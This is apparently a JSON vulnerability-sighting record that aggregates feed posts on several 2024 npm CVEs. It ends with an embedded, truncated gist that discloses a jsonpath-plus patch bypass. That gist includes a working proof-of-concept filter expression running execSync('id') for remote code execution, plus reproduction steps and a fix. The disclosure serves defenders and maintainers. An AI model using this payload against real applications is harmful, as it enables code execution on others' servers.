{"vulnerability": "cve-2024-2153", "sightings": [{"uuid": "239c089d-6bb3-4294-a779-15f850161fad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113445581318070567", "content": "", "creation_timestamp": "2024-11-08T05:03:15.990976Z"}, {"uuid": "71d517a0-23df-4bdc-b2a6-cee25c32b0c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "seen", "source": "https://gist.github.com/ton77v/932a3f8b5d57d2625b31328796a3cf30", "content": "", "creation_timestamp": "2025-02-01T06:22:08.000000Z"}, {"uuid": "538fd0b5-f8a1-47a5-8e4f-16291a1cc964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/114006161366925881", "content": "", "creation_timestamp": "2025-02-15T05:06:08.831971Z"}, {"uuid": "d0f98758-194f-4a5f-bb59-5d7b58d77822", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://bsky.app/profile/vulnalerts.bsky.social/post/3li7o65dim32h", "content": "", "creation_timestamp": "2025-02-15T12:00:08.892779Z"}, {"uuid": "cfcdb0f1-ecb1-48b6-8af3-4b4fab27faac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://bsky.app/profile/vulnalerts.bsky.social/post/3liawfmwhc72h", "content": "", "creation_timestamp": "2025-02-16T00:00:08.675265Z"}, {"uuid": "ab18baf8-2eac-477f-8ccd-cec6bc1fed49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "seen", "source": "https://gist.github.com/gregory-hive/802f4c8c5bd5becc607c1b7ebd88fcaf", "content": "", "creation_timestamp": "2025-05-22T14:53:41.000000Z"}, {"uuid": "cfcba34c-a574-4342-ade6-2950ad633398", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://gist.github.com/EduardoCorpay/fdaeb4ec65cc4a1c8fcd2fb0162de09c", "content": "", "creation_timestamp": "2025-06-11T15:29:00.000000Z"}, {"uuid": "f97e1e30-de69-4da3-a997-416c9e7aca60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "seen", "source": "https://gist.github.com/jrvssingh-cpu/5ca4be6b05f749c6962d84fae197cdc9", "content": "", "creation_timestamp": "2026-02-25T10:55:46.000000Z"}, {"uuid": "23fa0894-e494-4efe-be64-8b9348ec3e9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9172", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1a\u6f0f\u6d1e\u9a8c\u8bc1\n\u63cf\u8ff0\uff1ajsonpath-plus \u5305\uff08\u7248\u672c <=10.0.7\uff09\u5b58\u5728\u4e25\u91cd\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\uff08RCE\uff09\u6f0f\u6d1e\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u901a\u8fc7 Node.js \u7684 VM \u6a21\u5757\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\u8be5\u6f0f\u6d1e\u7531\u4e8e\u8f93\u5165\u9a8c\u8bc1\u4e0d\u4e25\u683c\u5bfc\u81f4\uff0c\u5f71\u54cd\u7248\u672c\u4e3a 10.0.7 \u4ee5\u4e0b\uff0cCVSS \u5206\u6570\u4e3a 9.8\uff08\u6781\u5176\u4e25\u91cd\uff09\u3002\u6f0f\u6d1e\u9996\u6b21\u516c\u5f00\u4e8e 2024 \u5e74 10 \u6708 11 \u65e5\u3002\nURL\uff1ahttps://github.com/XiaomingX/cve-2024-21534-poc\n\n\u6807\u7b7e\uff1a#\u6f0f\u6d1e\u9a8c\u8bc1", "creation_timestamp": "2024-11-25T06:25:50.000000Z"}, {"uuid": "2bdfd131-5ea5-46bf-a98e-df706628474c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9224", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE) due to improper input sanitization\nURL\uff1ahttps://github.com/ghostwirez/CVE-2024-39090-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-29T01:05:02.000000Z"}, {"uuid": "c9c3bd2b-be2e-4ec3-b903-2bc0dd0ed231", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9221", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE) due to improper input sanitization\nURL\uff1ahttps://github.com/verylazytech/cve-2024-21534\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-28T18:27:39.000000Z"}, {"uuid": "14b1d604-f7ee-425d-98ae-53e998f6e92e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4533", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1302\n\ud83d\udd25 CVSS Score: 9.8 (CVSS_V3)\n\ud83d\udd39 Description: Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.\n\n**Note:**\n\nThis is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).\n\ud83d\udccf Published: 2025-02-15T06:30:51Z\n\ud83d\udccf Modified: 2025-02-15T06:30:51Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1302\n2. https://github.com/JSONPath-Plus/JSONPath/commit/30942896d27cb8a806b965a5ca9ef9f686be24ee\n3. https://gist.github.com/nickcopi/11ba3cb4fdee6f89e02e6afae8db6456\n4. https://github.com/JSONPath-Plus/JSONPath/blob/8e4acf8aff5f446aa66323e12394ac5615c3b260/src/Safe-Script.js%23L127\n5. https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-8719585", "creation_timestamp": "2025-02-15T07:11:13.000000Z"}, {"uuid": "b08733ff-1cea-4d20-8523-3b4155266f98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16797", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-21538\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: Versions of the package cross-spawn before 6.0.6, from 7.0.0 and before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.\n\ud83d\udccf Published: 2024-11-08T05:00:04.695Z\n\ud83d\udccf Modified: 2025-05-19T03:13:17.431Z\n\ud83d\udd17 References:\n1. https://security.snyk.io/vuln/SNYK-JS-CROSSSPAWN-8303230\n2. https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-8366349\n3. https://github.com/moxystudio/node-cross-spawn/pull/160\n4. https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\n5. https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff", "creation_timestamp": "2025-05-19T03:38:21.000000Z"}, {"uuid": "f01931e1-da93-40fa-a540-b589d8c16711", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://t.me/cvedetector/18161", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-1302 - Jsonpath-Plus Remote Code Execution (RCE)\", \n  \"Content\": \"CVE ID : CVE-2025-1302 \nPublished : Feb. 15, 2025, 5:15 a.m. | 2\u00a0hours, 2\u00a0minutes ago \nDescription : Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode.  \n  \n**Note:**  \n  \nThis is caused by an incomplete fix for [CVE-2024-21534](). \nSeverity: 9.8 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"15 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-15T08:30:33.000000Z"}, {"uuid": "26f062c2-1ffc-41d1-9320-8698351a6961", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21539", "type": "seen", "source": "https://t.me/cvedetector/11433", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21539 - EsLint Plugin Kit ReDoS Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-21539 \nPublished : Nov. 19, 2024, 5:15 a.m. | 24\u00a0minutes ago \nDescription : Versions of the package @eslint/plugin-kit before 0.2.3 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by exploiting this vulnerability. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"19 Nov 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-11-19T06:46:39.000000Z"}, {"uuid": "90b92250-9679-4c64-bddd-89bbdb75f0ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21537", "type": "seen", "source": "https://t.me/cvedetector/9488", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21537 - Lilconfig Arbitrary Code Execution Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-21537 \nPublished : Oct. 31, 2024, 5:15 a.m. | 35\u00a0minutes ago \nDescription : Versions of the package lilconfig from 3.1.0 and before 3.1.1 are vulnerable to Arbitrary Code Execution due to the insecure usage of eval in the dynamicImport function. An attacker can exploit this vulnerability by passing a malicious input through the defaultLoaders function. \nSeverity: 8.8 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"31 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-31T06:54:55.000000Z"}, {"uuid": "2b16e6ad-4a69-4c72-a9e6-bf291463adee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21536", "type": "seen", "source": "https://t.me/cvedetector/8353", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21536 - Apache http-proxy-middleware Denial of Service\", \n  \"Content\": \"CVE ID : CVE-2024-21536 \nPublished : Oct. 19, 2024, 5:15 a.m. | 36\u00a0minutes ago \nDescription : Versions of the package http-proxy-middleware before 2.0.7, from 3.0.0 and before 3.0.3 are vulnerable to Denial of Service (DoS) due to an UnhandledPromiseRejection error thrown by micromatch. An attacker could kill the Node.js process and crash the server by making requests to certain paths. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"19 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-19T07:58:03.000000Z"}, {"uuid": "4025a354-8538-4674-8282-dcbce26b0d0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21538", "type": "seen", "source": "https://t.me/cvedetector/10157", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21538 - Node.js Cross-Spawn ReDoS Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-21538 \nPublished : Nov. 8, 2024, 5:15 a.m. | 40\u00a0minutes ago \nDescription : Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string. \nSeverity: 7.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"08 Nov 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-11-08T07:09:24.000000Z"}, {"uuid": "56d892bf-4cf4-4060-a130-b1412603cd98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21533", "type": "seen", "source": "https://t.me/cvedetector/7313", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21533 - ggit Arbitrary Argument Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-21533 \nPublished : Oct. 8, 2024, 5:15 a.m. | 27\u00a0minutes ago \nDescription : All versions of the package ggit are vulnerable to Arbitrary Argument Injection via the clone() API, which allows specifying the remote URL to clone and the file on disk to clone to. The library does not sanitize for user input or validate a given URL scheme, nor does it properly pass command-line flags to the git binary using the double-dash POSIX characters (--) to communicate the end of options. \nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"08 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-08T07:51:17.000000Z"}, {"uuid": "890cc480-cdea-4116-9588-f14ae1ffa732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21532", "type": "seen", "source": "https://t.me/cvedetector/7314", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21532 - Git executable Injection in ggit\", \n  \"Content\": \"CVE ID : CVE-2024-21532 \nPublished : Oct. 8, 2024, 5:15 a.m. | 27\u00a0minutes ago \nDescription : All versions of the package ggit are vulnerable to Command Injection via the fetchTags(branch) API, which allows user input to specify the branch to be fetched and then concatenates this string along with a git command which is then passed to the unsafe exec() Node.js child process API. \nSeverity: 7.3 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"08 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-08T07:51:18.000000Z"}, {"uuid": "8b7aae67-5893-4958-b9fa-473972be2ccb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21535", "type": "seen", "source": "https://t.me/cvedetector/7882", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21535 - Markdown-to-jsx Cross-site Scripting (XSS)\", \n  \"Content\": \"CVE ID : CVE-2024-21535 \nPublished : Oct. 15, 2024, 5:15 a.m. | 22\u00a0minutes ago \nDescription : Versions of the package markdown-to-jsx before 7.4.0 are vulnerable to Cross-site Scripting (XSS) via the src property due to improper input sanitization. An attacker can execute arbitrary code by injecting a malicious iframe element in the markdown. \nSeverity: 6.1 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"15 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-15T07:44:14.000000Z"}, {"uuid": "616e8430-e2bf-4fa8-820b-b1da5c9d5c2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21530", "type": "seen", "source": "https://t.me/cvedetector/6802", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21530 - Cocoon Reusing Nonce Cryptography Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-21530 \nPublished : Oct. 2, 2024, 5:15 a.m. | 40\u00a0minutes ago \nDescription : Versions of the package cocoon before 0.4.0 are vulnerable to Reusing a Nonce, Key Pair in Encryption when the encrypt, wrap, and dump functions are sequentially called. An attacker can generate the same ciphertext by creating a new encrypted message with the same cocoon object.  \n  \n**Note:**  \nThe issue does NOT affect objects created with Cocoon::new which utilizes ThreadRng. \nSeverity: 4.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"02 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-02T07:59:53.000000Z"}, {"uuid": "e51d1b99-cfc8-4ea7-9b59-67bea3a3e0c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21531", "type": "seen", "source": "https://t.me/cvedetector/6700", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-21531 - Apache Git Command Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-21531 \nPublished : Oct. 1, 2024, 5:15 a.m. | 24\u00a0minutes ago \nDescription : All versions of the package git-shallow-clone are vulnerable to Command injection due to missing sanitization or mitigation flags in the process variable of the gitShallowClone function. \nSeverity: 5.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"01 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-01T07:43:03.000000Z"}, {"uuid": "95e8c176-99eb-4ae1-af4b-09d9d766f0e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "Telegram/B6Ro0XJaa5S2akdaKXUWQAw0I4uY8L6ZTgeKaeLAe3cSfbhr", "content": "", "creation_timestamp": "2025-02-15T23:50:18.000000Z"}, {"uuid": "194f1915-7fde-4f29-bc74-5f12bbeee16e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "published-proof-of-concept", "source": "Telegram/WDhF5XevgqviS_8KCjmZ87T-69A_WAI0o-K_reZtmExyTW4", "content": "", "creation_timestamp": "2024-11-13T11:34:23.000000Z"}, {"uuid": "75aea043-7a2b-4616-9eef-0ee0bc21ed68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-2153", "type": "seen", "source": "https://t.me/ctinow/198956", "content": "https://ift.tt/rUabhjA\nCVE-2024-2153", "creation_timestamp": "2024-03-04T02:26:52.000000Z"}, {"uuid": "3b34ff12-d0ab-4ff4-bd1c-cb9eb2edda9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-2153", "type": "seen", "source": "https://t.me/ctinow/198951", "content": "https://ift.tt/rUabhjA\nCVE-2024-2153", "creation_timestamp": "2024-03-04T02:21:35.000000Z"}, {"uuid": "46e61159-2dd3-496a-95ba-6674f26359b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21534", "type": "seen", "source": "https://gist.github.com/harikrishnankv/ea3e99b5227529d90b21799dfa214b79", "content": "# jsonpath-plus CVE-2024-21534 Patch Bypass \u2192 RCE\n\n**Package:** `jsonpath-plus`  \n**Affected version:** \u2264 10.4.0 (latest as of 2026-05-06)  \n**Weekly downloads:** ~10 million  \n**Type:** Incomplete patch bypass \u2192 Remote Code Execution  \n**Bypasses:** CVE-2024-21534 fix (`BLOCKED_PROTO_PROPERTIES`)  \n**Discovered:** 2026-05-06  \n\n---\n\n## What Is This\n\nCVE-2024-21534 was a critical RCE in jsonpath-plus where filter expressions\ncould access the `Function` constructor via prototype chain to execute arbitrary\ncode. The patch added `BLOCKED_PROTO_PROPERTIES` to block `constructor` access.\n\n**This bypass defeats that patch.** The fix has two flaws:\n\n1. **MemberExpression guard** \u2014 only blocks inherited `constructor`, not own\n2. **CallExpression guard** \u2014 dead code, identity check never fires\n\nLatest version (10.4.0) remains exploitable.\n\n---\n\n## Root Cause\n\n### Flaw 1 \u2014 evalMemberExpression (line 1313)\n\n```js\nconst BLOCKED_PROTO_PROPERTIES = new Set(['constructor', '__proto__', ...]);\n\n// Only blocks constructor when NOT an own property:\nif (!Object.hasOwn(obj, prop) && BLOCKED_PROTO_PROPERTIES.has(prop)) {\n    throw TypeError(...)\n}\n//  ^^^ bypass: if data.users[0].constructor is OWN property,\n//              Object.hasOwn() = true \u2192 !true = false \u2192 NO throw\n\nconst result = obj[prop];          // = Function\nif (typeof result === 'function') {\n    return result.bind(obj);       // returns Function.bind(obj)\n}\n```\n\n### Flaw 2 \u2014 evalCallExpression (line 1343, dead code)\n\n```js\nif (func === Function) {\n    // Comment: \"unreachable since BLOCKED_PROTO_PROPERTIES includes 'constructor'\"\n    // \u2190 WRONG. Own property bypasses BLOCKED_PROTO_PROPERTIES.\n    // Even if reached: func = Function.bind(obj) \u2260 Function \u2192 check never fires.\n    throw new Error('Function constructor is disabled');\n}\n// func('return process')() executes freely\n```\n\n---\n\n## Proof of Concept\n\n```js\nconst { JSONPath } = require('jsonpath-plus'); // 10.4.0\n\n// Object where 'constructor' is an OWN property (not inherited)\n// Occurs after: msgpack/BSON deserialization, class-transformer,\n// Object.assign onto class instances, etc.\nconst data = {\n  users: [\n    {\n      name: 'alice',\n      constructor: Function   // own property \u2192 bypasses hasOwn check\n    }\n  ]\n};\n\n// Verify the bypass conditions:\nconsole.log(Object.hasOwn(data.users[0], 'constructor')); // true  \u2192 block skipped\nconsole.log(Function.bind({}) === Function);               // false \u2192 dead code guard\n\n// Filter expression escapes sandbox via own constructor\nJSONPath({\n  path: \"$.users[?(@.constructor('return process')().mainModule.require('child_process').execSync('id').toString())]\",\n  json: data\n});\n// Output: uid=0(root) gid=0(root) groups=0(root)\n```\n\n---\n\n## How to Reproduce\n\n```bash\n# 1. Clone / setup\nmkdir bypass-demo && cd bypass-demo\nnpm init -y\nnpm install jsonpath-plus@10.4.0\n\n# 2. Run PoC\nnode poc.js\n```\n\nExpected output:\n```\njsonpath-plus version: 10.4.0\n\n[*] Object.hasOwn check:\n    Object.hasOwn(data.users[0], \"constructor\") = true\n\n[*] bind identity check:\n    Function.bind({}) === Function = false\n\n[*] Running JSONPath with malicious filter expression...\n\n[+] Matched items: [ 'alice' ]\n[+] OS command output: uid=0(root) gid=0(root) groups=0(root)\n\n[!] RCE confirmed on jsonpath-plus@10.4.0 (latest)\n```\n\n---\n\n## Attack Scenarios\n\n### When exploitable\n\n| Scenario | Exploitable |\n|----------|------------|\n| App queries deserialized msgpack/BSON data | \u2705 |\n| App uses `Object.assign(classInstance, userData)` then queries | \u2705 |\n| App uses class-transformer `plainToInstance` then queries | \u2705 |\n| User controls JSONPath path expression (original CVE vector) | \u2705 |\n| Pure `JSON.parse()` data, no reconstruction | \u274c |\n\n### Why JSON.parse is safe (but not enough)\n\n`JSON.parse` strips function references \u2014 `constructor` becomes a string,\nnot `Function`. However many real apps go through msgpack, BSON, or class\nreconstruction pipelines where function references survive.\n\n---\n\n## Two-Layer Bypass Summary\n\n```\nAttack data:  { constructor: Function }   \u2190 own property\n\nLayer 1 \u2014 MemberExpression:\n  Object.hasOwn(obj, 'constructor') = true\n  \u2192 !true && BLOCKED.has('constructor')\n  \u2192 false && true\n  \u2192 false  \u2190 NO THROW, constructor returned as Function.bind(obj)\n\nLayer 2 \u2014 CallExpression:\n  func = Function.bind(obj)\n  func === Function  \u2192  false  \u2190 dead code, never throws\n  func('return process')()     \u2190 executes freely\n```\n\n---\n\n## Suggested Fix\n\n```js\n// evalMemberExpression \u2014 also block own constructor that IS Function:\nconst result = obj[prop];\nif (BLOCKED_PROTO_PROPERTIES.has(prop)) {\n    throw new TypeError(`Property '${prop}' access is blocked`);\n}\n// OR strip constructor from data before evaluation\n\n// evalCallExpression \u2014 fix identity check for bound functions:\nif (func === Function || func.toString() === Function.toString()) {\n    throw new Error('Function constructor is disabled');\n}\n```\n\n---\n\n## Timeline\n\n| Date | Event |\n|------|-------|\n| 2024 | CVE-2024-21534 published, patch released |\n| 2026-05-06 | Patch bypass discovered in v10.4.0 (latest) |\n| 2026-05-06 | Reported to maintainers / Snyk |\n\n---\n\n## Report\n\n- https://github.com/JSONPath-Plus/JSONPath/security/advisories/new\n- https://snyk.io/vulnerability-disclosure\n- https://cveform.mitre.org\n\n\n/**\n * jsonpath-plus CVE-2024-21534 Patch Bypass \u2014 RCE PoC\n *\n * Affected : jsonpath-plus <= 10.4.0 (latest as of 2026-05-06)\n * Downloads: ~10 million/week\n * Bypass of: CVE-2024-21534 patch (BLOCKED_PROTO_PROPERTIES)\n *\n * ROOT CAUSE\n * ----------\n * evalMemberExpression blocks constructor access only when NOT an own property:\n *\n *   if (!Object.hasOwn(obj, prop) && BLOCKED_PROTO_PROPERTIES.has(prop)) throw\n *\n * When a data element has `constructor` as an OWN property (e.g. after\n * deserialization via msgpack/BSON/class-transformer or Object.assign on\n * class instances), Object.hasOwn() = true \u2192 block skipped \u2192 Function returned.\n *\n * Second guard in evalCallExpression is dead code:\n *\n *   if (func === Function) throw  // NEVER true:\n *                                 // func = Function.bind(obj) !== Function\n *\n * PRECONDITIONS\n * -------------\n * 1. App queries attacker-influenced data with JSONPath filter expressions\n * 2. Data passes through non-JSON serialization where Function refs survive\n *    (msgpack, BSON, class-transformer, Object.assign onto class instances)\n *    OR app uses user-controlled JSONPath path expressions (original CVE vector)\n *\n * REPRODUCE\n * ---------\n *   npm install jsonpath-plus@10.4.0\n *   node poc.js\n */\n\n'use strict';\nconst { JSONPath } = require('jsonpath-plus');\nconst { execSync } = require('child_process');\nconst fs = require('fs');\n\nconsole.log('jsonpath-plus version:', require('./node_modules/jsonpath-plus/package.json').version);\n\n// Step 1 \u2014 Simulate deserialization where constructor survives as own property\n// (msgpack, BSON, class-transformer, Object.assign on class instance, etc.)\nconst data = {\n  users: [\n    {\n      name: 'alice',\n      role: 'user',\n      constructor: Function   // own property \u2014 not inherited \u2014 bypasses hasOwn check\n    }\n  ]\n};\n\nconsole.log('\\n[*] Object.hasOwn check:');\nconsole.log('    Object.hasOwn(data.users[0], \"constructor\") =',\n  Object.hasOwn(data.users[0], 'constructor'));  // true \u2192 block skipped\n\nconsole.log('\\n[*] bind identity check:');\nconsole.log('    Function.bind({}) === Function =',\n  